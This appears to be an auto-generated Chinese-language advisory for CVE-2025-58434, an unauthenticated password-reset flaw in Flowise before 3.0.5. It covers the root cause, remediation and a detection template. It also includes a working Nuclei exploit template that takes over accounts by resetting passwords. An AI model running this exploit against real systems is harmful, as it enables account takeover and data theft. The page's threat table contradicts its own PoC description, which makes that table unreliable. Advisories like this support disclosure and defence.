[webapps] Flowise < 3.0.5 - Missing Authentication for Critical Function
CVE-2025-58434
Flowise < 3.0.5 忘记密码与重置密码接口缺少身份验证,可任意重置已注册用户密码。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-58434 |
|---|---|
| 漏洞类型 | 未授权访问关键函数 |
| 受影响版本 | Flowise < 3.0.5 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-05-13 |
| 提交者 | [nltt0] (https://github.com/nltt-br)) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
Flowise 的 /api/v1/account/forgot-password 接口无需认证即可为任意已注册邮箱生成临时令牌 tempToken,随后 /api/v1/account/reset-password 接口使用该令牌重置密码,两个接口均未验证请求者身份或令牌来源合法性,导致攻击者可遍历邮箱完成密码重置。
🎯 攻击场景
1. 攻击者已知目标用户的注册邮箱地址; 2. 向 /api/v1/account/forgot-password 发送 POST 请求,JSON 中包含 user.email; 3. 接口返回 201,响应中包含 user.tempToken; 4. 向 /api/v1/account/reset-password 发送 POST 请求,JSON 中包含 user.email、user.tempToken、user.password; 5. 接口成功重置密码,返回成功标志。
💥 漏洞影响
攻击者可无需原密码重置任意已知邮箱账户的密码,直接接管账户,进而访问系统内敏感数据或执行后续操作。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-58434-exploit
info:
name: Flowise < 3.0.5 - Missing Authentication Password Reset
author: your-username
severity: high
description: |
Flowise before version 3.0.5 is vulnerable to missing authentication for critical functions.
This exploit sends a forgot-password request to obtain a temporary token and then
resets the password for any registered user without proper authorization.
reference:
- https://www.exploit-db.com/XXXXX
- https://nvd.nist.gov/vuln/detail/CVE-2025-58434
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-58434
tags: cve,cve2025,flowise,unauth
variables:
email: "{{username}}"
password: "Exploited@2025"
http:
- raw:
- |
POST {{BaseURL}}/api/v1/account/forgot-password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"user":{"email":"{{email}}"}}
- |
POST {{BaseURL}}/api/v1/account/reset-password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"user":{"email":"{{email}}","tempToken":"{{temp_token}}","password":"{{password}}"}}
extractors:
- type: json
name: temp_token
part: body
internal: true
json:
- '.user.tempToken'
matchers:
- type: word
words:
- "Password changed"
part: body
condition: and
- type: status
status:
- 200🔬 深度技术分析
PoC 通过 requests 库发起两步操作: 1. 构造 { 'user': { 'email': email } } 请求 /api/v1/account/forgot-password,若返回 201 则从 JSON 中提取 tempToken; 2. 构造 { 'user': { 'email': email, 'tempToken': tempToken, 'password': newpassword } } 请求 /api/v1/account/reset-password,完成密码重置并打印成功信息;非 201 状态码则提示用户未注册。
🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-58434-detection
info:
name: Flowise < 3.0.5 - Version Detection
author: your-username
severity: high
description: |
Flowise before version 3.0.5 is vulnerable to missing authentication for critical functions,
allowing an attacker to reset the password of any registered user without proper authentication.
reference:
- https://www.exploit-db.com/XXXXX
- https://nvd.nist.gov/vuln/detail/CVE-2025-58434
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-58434
tags: cve,cve2025,flowise,unauth
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/version"
- "{{BaseURL}}/package.json"
- "{{BaseURL}}/version.txt"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "Flowise"
part: body
- type: regex
part: body
regex:
- '("version":\s*")([0-2]\.\d+\.\d+|3\.0\.[0-4])'
- 'version\s*=\s*([0-2]\.\d+\.\d+|3\.0\.[0-4])'
extractors:
- type: regex
part: body
group: 1
regex:
- '(\d+\.\d+\.\d+)'🛡️ 修复建议
升级至 Flowise >= 3.0.5;临时缓解措施:在反向代理层面限制 /api/v1/account/forgot-password 和 /api/v1/account/reset-password 的访问源 IP 或添加验证码机制。
📎 参考链接
- https://github.com/FlowiseAI/Flowise
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58434
- Exploit-DB 原文
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-20 08:08 | 来源: Exploit-DB